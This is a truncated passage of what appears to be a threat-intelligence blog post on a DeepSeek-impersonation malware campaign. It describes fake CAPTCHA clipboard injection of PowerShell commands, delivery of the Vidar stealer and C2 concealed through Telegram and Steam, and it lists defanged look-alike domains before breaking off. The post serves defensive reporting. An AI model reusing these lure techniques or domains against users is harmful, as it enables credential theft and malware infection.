IntroductionThe rapid rise of generative AI tools has created opportunities and challenges for cybercriminals. In an instant, industries are being reshaped while new attack surfaces are being exposed. DeepSeek AI chatbot that launched on January 20, 2025, quickly gained international attention, making it a prime target for abuse. Leveraging a tactic known as brand impersonation, threat actors craft fraudulent websites designed to impersonate DeepSeek and mislead unsuspecting users into divulging sensitive information and/or executing harmful malware. Zscaler ThreatLabz has highlighted concerns about open source generative AI tools, like DeepSeek, being misused by threat actors to enhance exploitation and data theft strategies. This blog post delves into a DeepSeek-themed malware campaign that abuses the popularity of the name. Alongside brand impersonation, this attack chain demonstrates techniques, including clipboard injection to deliver malicious PowerShell commands, the deployment of the Vidar information stealer, and the use of legitimate platforms like Telegram and Steam to conceal command-and-control (C2) communication. We also examine additional look-alike domains designed to lure users into interacting with malicious webpages.Key Takeaways Cybercriminals are leveraging DeepSeek’s popularity by creating websites hosted on fake look-alike domains to deceive users and deliver the Vidar information stealer. The malware campaign uses a fake CAPTCHA page to conduct clipboard injection, secretly copying a malicious PowerShell command for users to execute.It is crucial for organizations to have well defined policies and security controls governing the use of generative AI models and applications in their environment, both for sanctioned and unsanctioned applications.DeepSeek Look-Alike DomainsThreatLabz has identified numerous domains leveraging the popularity of DeepSeek that imitate the official website and affiliated websites. These fraudulent domains are used to facilitate a variety of malicious activities, including cryptocurrency pump-and-dump schemes, fake forums designed to steal user credentials, bogus gift card scams, and counterfeit gambling platforms. Below is a list of domains observed impersonating DeepSeek during our investigation.presales-deepseek[.]comdeepseekpg[.]betdeepseekaiagent[.]livedeepseekjulebu[.]shopdeepseekr1[.]clubdeepseekonchain[.]comdeepseek-v3[.]xyzdeepseek-pro[.]clouddeepseekai[.]clubdeepseekpepe[.]sitedeepseekai[.]g
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
Read the original article: